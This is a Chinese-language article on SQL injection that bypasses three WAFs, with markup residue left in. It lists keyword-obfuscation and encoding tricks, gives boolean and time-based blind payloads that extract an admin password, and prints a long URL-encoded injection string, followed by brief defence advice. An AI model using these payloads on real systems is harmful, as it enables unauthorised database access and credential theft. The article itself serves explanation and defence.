绕过三个WAF的SQL注入技术分析<\/h1>

漏洞发现与初步分析<\/h2>

漏洞类型<\/strong>：字符串型盲注（无报错回显）<\/li>

初步测试<\/strong>：

注入单引号'<\/code>时，返回404或500错误（交替出现，无规律）<\/li>
注入两个单引号''<\/code>时，页面正常显示<\/li> <\/ul> <\/li>
环境特点<\/strong>：存在WAF（Web应用防火墙）防护，且可能有混淆情况<\/li> <\/ol> WAF绕过技术<\/h2> 1. 第一个WAF绕过<\/h3> 问题<\/strong>：直接使用'<\/code>会被拦截<\/p> 绕过方法<\/strong>：<\/p> 使用URL编码：%27<\/code>替代单引号<\/li> 使用注释混淆：'-- -<\/code>或'\/*xxx*\/<\/code><\/li> 使用空白字符：'%09<\/code>（水平制表符）、'%0A<\/code>（换行符）、'%0D<\/code>（回车符）<\/li> <\/ul> 2. 第二个WAF绕过<\/h3> 问题<\/strong>：检测到AND<\/code>、OR<\/code>等关键词<\/p> 绕过方法<\/strong>：<\/p> 大小写混合：aNd<\/code>、Or<\/code><\/li> 内联注释：\/*!AND*\/<\/code><\/li> 空白字符分隔：A N D<\/code><\/li> 使用数学运算符替代：&&<\/code>替代AND<\/code>，||<\/code>替代OR<\/code><\/li> 使用^<\/code>（异或）操作符<\/li> <\/ul> 3. 第三个WAF绕过<\/h3> 问题<\/strong>：检测到SELECT<\/code>、FROM<\/code>等SQL关键字<\/p> 绕过方法<\/strong>：<\/p> 使用十六进制编码：0x73656C656374<\/code>替代select<\/code><\/li> 使用注释分割：SEL\/*xxx*\/ECT<\/code><\/li> 使用反引号：SELECT<\/code><\/li> 使用动态执行：PREPARE stmt FROM CONCAT('SEL','ECT'); EXECUTE stmt;<\/code><\/li> <\/ul> 盲注技术实现<\/h2> 布尔盲注<\/strong>：<\/p> ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='<\/span>admin<\/span>')='<\/span>a'-- - <\/span><\/span><\/span><\/code><\/pre><\/li> 时间盲注<\/strong>：<\/p> ' AND IF(SUBSTRING(password,1,1)='<\/span>a',SLEEP(5),0)-- - <\/span><\/span><\/span><\/code><\/pre><\/li> 绕过技巧<\/strong>：<\/p> 使用LIKE<\/code>替代=<\/code>：'a' LIKE 'a'<\/code><\/li> 使用REGEXP<\/code>：'a' REGEXP '^a'<\/code><\/li> 使用MID<\/code>替代SUBSTRING<\/code><\/li> <\/ul> <\/li> <\/ol> 完整注入示例<\/h2> %<\/span>27<\/span>%<\/span>20<\/span>%<\/span>41<\/span>%<\/span>4<\/span>E%<\/span>44<\/span>%<\/span>20<\/span>%<\/span>28<\/span>%<\/span>53<\/span>%<\/span>45<\/span>%<\/span>4<\/span>C<\/span>%<\/span>45<\/span>%<\/span>43<\/span>%<\/span>54<\/span>%<\/span>20<\/span>%<\/span>31<\/span>%<\/span>20<\/span>%<\/span>46<\/span>%<\/span>52<\/span>%<\/span>4<\/span>F%<\/span>4<\/span>D%<\/span>20<\/span>%<\/span>28<\/span>%<\/span>53<\/span>%<\/span>45<\/span>%<\/span>4<\/span>C<\/span>%<\/span>45<\/span>%<\/span>43<\/span>%<\/span>54<\/span>%<\/span>20<\/span>%<\/span>43<\/span>%<\/span>4<\/span>F%<\/span>55<\/span>%<\/span>4<\/span>E%<\/span>54<\/span>%<\/span>28<\/span>%<\/span>2<\/span>A%<\/span>29<\/span>%<\/span>2<\/span>C<\/span>%<\/span>43<\/span>%<\/span>4<\/span>F%<\/span>4<\/span>E%<\/span>43<\/span>%<\/span>41<\/span>%<\/span>54<\/span>%<\/span>28<\/span>%<\/span>30<\/span>%<\/span>78<\/span>%<\/span>37<\/span>%<\/span>61<\/span>%<\/span>2<\/span>C<\/span>%<\/span>28<\/span>%<\/span>53<\/span>%<\/span>45<\/span>%<\/span>4<\/span>C<\/span>%<\/span>45<\/span>%<\/span>43<\/span>%<\/span>54<\/span>%<\/span>20<\/span>%<\/span>28<\/span>%<\/span>53<\/span>%<\/span>45<\/span>%<\/span>4<\/span>C<\/span>%<\/span>45<\/span>%<\/span>43<\/span>%<\/span>54<\/span>%<\/span>20<\/span>%<\/span>43<\/span>%<\/span>4<\/span>F%<\/span>4<\/span>E%<\/span>43<\/span>%<\/span>41<\/span>%<\/span>54<\/span>%<\/span>28<\/span>%<\/span>30<\/span>%<\/span>78<\/span>%<\/span>37<\/span>%<\/span>61<\/span>%<\/span>2<\/span>C<\/span>%<\/span>30<\/span>%<\/span>78<\/span>%<\/span>37<\/span>%<\/span>61<\/span>%<\/span>2<\/span>C<\/span>%<\/span>30<\/span>%<\/span>78<\/span>%<\/span>37<\/span>%<\/span>61<\/span>%<\/span>29<\/span>%<\/span>29<\/span>%<\/span>29<\/span>%<\/span>2<\/span>C<\/span>%<\/span>30<\/span>%<\/span>78<\/span>%<\/span>37<\/span>%<\/span>61<\/span>%<\/span>29<\/span>%<\/span>20<\/span>%<\/span>46<\/span>%<\/span>52<\/span>%<\/span>4<\/span>F%<\/span>4<\/span>D%<\/span>20<\/span>%<\/span>69<\/span>%<\/span>6<\/span>E%<\/span>66<\/span>%<\/span>6<\/span>F%<\/span>72<\/span>%<\/span>6<\/span>D%<\/span>61<\/span>%<\/span>74<\/span>%<\/span>69<\/span>%<\/span>6<\/span>F%<\/span>6<\/span>E%<\/span>5<\/span>F%<\/span>73<\/span>%<\/span>63<\/span>%<\/span>68<\/span>%<\/span>65<\/span>%<\/span>6<\/span>D%<\/span>61<\/span>%<\/span>2<\/span>E%<\/span>74<\/span>%<\/span>61<\/span>%<\/span>62<\/span>%<\/span>6<\/span>C<\/span>%<\/span>65<\/span>%<\/span>73<\/span>%<\/span>20<\/span>%<\/span>57<\/span>%<\/span>48<\/span>%<\/span>45<\/span>%<\/span>52<\/span>%<\/span>45<\/span>%<\/span>20<\/span>%<\/span>74<\/span>%<\/span>61<\/span>%<\/span>62<\/span>%<\/span>6<\/span>C<\/span>%<\/span>65<\/span>%<\/span>5<\/span>F%<\/span>73<\/span>%<\/span>63<\/span>%<\/span>68<\/span>%<\/span>65<\/span>%<\/span>6<\/span>D%<\/span>61<\/span>%<\/span>3<\/span>D%<\/span>64<\/span>%<\/span>61<\/span>%<\/span>74<\/span>%<\/span>61<\/span>%<\/span>62<\/span>%<\/span>61<\/span>%<\/span>73<\/span>%<\/span>65<\/span>%<\/span>28<\/span>%<\/span>29<\/span>%<\/span>20<\/span>%<\/span>4<\/span>C<\/span>%<\/span>49<\/span>%<\/span>4<\/span>D%<\/span>49<\/span>%<\/span>54<\/span>%<\/span>20<\/span>%<\/span>30<\/span>%<\/span>2<\/span>C<\/span>%<\/span>31<\/span>%<\/span>29<\/span>%<\/span>29<\/span>%<\/span>20<\/span>%<\/span>41<\/span>%<\/span>53<\/span>%<\/span>20<\/span>%<\/span>78<\/span>%<\/span>29<\/span>%<\/span>3<\/span>D%<\/span>31<\/span>%<\/span>20<\/span>%<\/span>2<\/span>D%<\/span>2<\/span>D%<\/span>20<\/span>%<\/span>2<\/span>D <\/span><\/span><\/code><\/pre>防御建议<\/h2> 使用参数化查询（预编译语句）<\/li> 实施最小权限原则<\/li> 对所有输入进行严格验证和过滤<\/li> 使用Web应用防火墙规则更新<\/li> 禁用错误信息回显<\/li> 定期进行安全审计和渗透测试<\/li> <\/ol> 总结<\/h2> 该案例展示了如何通过多层编码、注释混淆和关键字变形等技术绕过多个WAF防护进行SQL注入攻击。攻击者需要耐心测试各种绕过方法，并组合使用多种技术才能成功实施注入。防御方则需要采取深度防御策略，不仅依赖WAF，还要从代码层面做好防护。<\/p>